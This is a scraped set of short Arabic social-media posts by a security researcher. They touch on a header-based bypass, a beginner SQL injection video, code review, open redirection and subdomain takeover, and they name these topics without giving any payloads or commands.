أخيرا تنضاف على الـ Request Header بالشكل هذا ، وماعليك إلا إنك ترسل الريكويست وألف مبروك الـ Bypass ( بإذن اللي ماتنام عينه )

3

1

14

Mesh3l

@Mesh3l_911

2 years

@HitmanF15 مقطع للمبتدئين فيه شرح لأساسيات - SQLi Black/White box approaches بحسب رأيي المتواضع، كذا ممكن المبتدئ يتأسس بالطريقة الصحيحة في أي ثغرة. 1-يفهم من الأساس إيش سببها؟ 2-يفهم كيف ممكن تستغل؟ 3-وفالأخير يفهم إيش هي الـ Countermeasures(Preventions) ماقصرت يبوعبدالعزيز♥️

1

13

Mesh3l

@Mesh3l_911

4 years

ونتيجة للفحص لقى ملف اسمه Home.js ، حلوين حلوين بدأ هنا الأكشن 🔥. أول شي ممكن يسويه ، يروح يشوف محتوى الملف وهذا بالفعل اللي صار وبكذا ننتقل للمرحلة الأخيرة وهي 3) Code Review : بكل اختصار هي عملية فحص الكود بحثاً عن أي ضعف برمجي < صرفت لكم تعريف

1

2

12

Mesh3l

@Mesh3l_911

4 years

فالبداية لازم نعرف إن عندنا نوعين من ثغرة الـ Open Redirection :

0

2

12

Mesh3l

@Mesh3l_911

4 years

واخييييرا ، كل شي جاهز ومثل ماتشوفون سجلنا دخول وهذا هو السيرفر

2

0

12

Mesh3l

@Mesh3l_911

3 years

قبل فترة نزلت موضوع عن الـ Subdomains TakeOver وكيف Mozilla معرّفين الثغرة غلط وذا الشي ممكن يضيع الشخص اللي يعتمد على مصدر واحد فقط ونبّهت على هالشي والحين أتوقع إن شاء الله واضحة ⬇️ ( لاتعتمد على مصدر واحد للمعلومة مهما كانت ثقتك فيه حالياً ) POC:

0

1

11